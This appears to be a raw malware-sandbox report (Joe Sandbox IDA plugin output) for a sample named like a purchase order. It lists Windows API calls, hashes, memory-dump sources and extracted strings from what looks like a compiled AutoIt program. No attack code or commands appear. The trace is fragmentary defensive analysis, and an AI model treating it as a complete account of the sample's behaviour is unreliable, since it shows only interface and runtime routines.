• GetSysColor.USER32(0000000F), ref: 0044A131
• GetWindowLongW.USER32(?,000000F0), ref: 0044A140
• GetSysColor.USER32(0000000F), ref: 0044A14F
• GetSysColor.USER32(00000005), ref: 0044A15B
• GetWindowDC.USER32(?), ref: 0044A1BE
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
• GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
• GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
• GetPixel.GDI32(00000000,?,?), ref: 0044A21D
• ReleaseDC.USER32(?,00000000), ref: 0044A229
• SetBkColor.GDI32(?,00000000), ref: 0044A24C
• GetSysColor.USER32(00000008), ref: 0044A265
• SetTextColor.GDI32(?,00000000), ref: 0044A270
• SetBkMode.GDI32(?,00000001), ref: 0044A282
• GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                  • String ID:
                                                                  • API String ID: 1744303182-0
                                                                  • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                  • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                  • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                  • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                  • __mtterm.LIBCMT ref: 00417C34
                                                                    • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                    • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                    • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                  • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                  • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                  • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                  • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                  • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                  • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                  • __init_pointers.LIBCMT ref: 00417CE6
                                                                  • __calloc_crt.LIBCMT ref: 00417D54
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                  • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                  • API String ID: 4163708885-3819984048
                                                                  • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                  • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                  • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                  • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                  • API String ID: 0-1896584978
                                                                  • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                  • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                  • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                  • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll$IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2485277191-404129466
                                                                  • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                  • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                  • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                  • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                  APIs
                                                                  • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                  • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                  • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                  • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                  • GetDesktopWindow.USER32 ref: 0045476F
                                                                  • GetWindowRect.USER32(00000000), ref: 00454776
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                  • GetClientRect.USER32(?,?), ref: 004547D2
                                                                  • PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
                                                                  • SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                  • String ID:
                                                                  • API String ID: 3869813825-0
                                                                  • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                  • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                  • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                  • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00464B28
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                  • _wcslen.LIBCMT ref: 00464C28
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                  • _wcslen.LIBCMT ref: 00464CBA
                                                                  • _wcslen.LIBCMT ref: 00464CD0
                                                                  • _wcslen.LIBCMT ref: 00464CEF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$Directory$CurrentSystem
                                                                  • String ID: D
                                                                  • API String ID: 1914653954-2746444292
                                                                  • Opcode ID: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                  • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                  • Opcode Fuzzy Hash: 44be7054643fd4ba856d6b2e359bfbfbb3de9f7e14d5395c76b411fe07bee919
                                                                  • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                  APIs
                                                                  • _wcsncpy.LIBCMT ref: 0045CE39
                                                                  • __wsplitpath.LIBCMT ref: 0045CE78
                                                                  • _wcscat.LIBCMT ref: 0045CE8B
                                                                  • _wcscat.LIBCMT ref: 0045CE9E
                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                    • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                  • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                  • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                  • _wcscpy.LIBCMT ref: 0045CF61
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                  • String ID: *.*
                                                                  • API String ID: 1153243558-438819550
                                                                  • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                  • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                  • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                  • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsicoll
                                                                  • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                  • API String ID: 3832890014-4202584635
                                                                  • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                  • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                  • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                  • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                  • GetFocus.USER32 ref: 0046A0DD
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                  • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$CtrlFocus
                                                                  • String ID: 0
                                                                  • API String ID: 1534620443-4108050209
                                                                  • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                  • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                  • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                  • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
APIs
• DestroyWindow.USER32(?), ref: 004558E3
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: Window$CreateDestroy
• String ID: ,$tooltips_class32
• API String ID: 1109047481-3856767331
• Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
• Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
• Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
• Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
APIs
• GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
• GetMenuItemCount.USER32(?), ref: 00468C45
• DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
• DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
• DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
• DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
• GetMenuItemCount.USER32 ref: 00468CFD
• SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
• GetCursorPos.USER32(?), ref: 00468D3F
• SetForegroundWindow.USER32(?), ref: 00468D49
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
• PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
• String ID: 0
• API String ID: 1441871840-4108050209
• Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
• Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
• Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
• Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
APIs
• GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
• LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
• __swprintf.LIBCMT ref: 00460915
• __swprintf.LIBCMT ref: 0046092D
• _wprintf.LIBCMT ref: 004609E1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
• String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
• API String ID: 3631882475-2268648507
• Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
• Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
• Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
• Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
APIs
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
• ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
• SendMessageW.USER32 ref: 00471740
• ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
• SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
• ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
• SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
• ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
• SendMessageW.USER32 ref: 0047184F
• SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
• SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
• DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
Memory Dump Source
• Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
Similarity
• API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
• String ID:
• API String ID: 4116747274-0
• Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
